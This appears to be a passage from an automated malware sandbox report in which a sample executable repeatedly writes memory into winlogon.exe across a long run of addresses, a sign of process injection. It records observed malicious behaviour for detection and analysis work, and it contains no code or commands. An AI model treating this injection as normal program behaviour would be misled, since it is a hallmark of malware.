Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CED4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CED6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEE0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEE1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEF2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEF4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEF6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF00000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF01000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF12000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF14000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF16000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF20000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF21000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF32000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF34000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF36000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF40000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF41000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF52000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF54000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF56000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF60000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF61000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF72000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF74000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF76000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF80000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF81000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF92000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF94000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF96000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFA0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFA1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFB2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFB4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFB6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFC0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFC1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFD2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFD4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFD6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFE0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFE1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFF2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFF4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFF6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D000000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D001000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D012000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D014000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D016000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D020000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D021000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D032000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D034000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D036000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D040000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D041000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D052000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D054000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D056000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D060000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D061000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D072000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D074000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D076000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D080000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D081000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D092000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D094000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D096000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D0A0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D0A1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D0B2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D0B4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D0B6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D0C0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D0C1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D0D2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D0D4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D0D6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D0E0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D0E1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D0F2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D0F4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D0F6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D100000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D101000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D112000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D114000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D116000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D120000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D121000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D132000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D134000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D136000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D140000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D141000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D152000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D154000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D156000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D160000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D161000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D172000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D174000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D176000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D180000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D181000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D192000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D194000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D196000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D1A0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D1A1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D1B2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D1B4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D1B6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D1C0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D1C1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D1D2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D1D4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D1D6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D1E0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D1E1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D1F2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D1F4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D1F6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D200000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D201000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D212000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D214000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D216000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D220000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D221000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D232000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D234000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D236000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D240000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D241000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D252000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D254000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D256000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D260000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D261000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D272000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D274000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D276000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D280000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D281000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D292000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D294000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D296000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D2A0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D2A1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D2B2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D2B4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D2B6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D2C0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D2C1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D2D2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D2D4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D2D6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D2E0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D2E1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D2F2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D2F4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D2F6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D300000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D301000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D312000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D314000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D316000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D320000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D321000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D332000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D334000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D336000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D340000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D341000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D352000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D354000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D356000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D360000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D361000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D372000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D374000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D376000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D380000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D381000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D392000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D394000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D396000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D3A0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D3A1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D3B2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D3B4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D3B6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D3C0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D3C1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D3D2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D3D4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D3D6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D3E0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D3E1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D3F2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D3F4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D3F6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D400000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D401000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D412000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D414000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D416000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D420000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D421000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D432000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D434000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D436000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D440000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D441000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D452000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D454000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D456000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D460000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D461000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D472000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D474000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D476000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D480000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D481000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D492000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D494000Jump to behavior
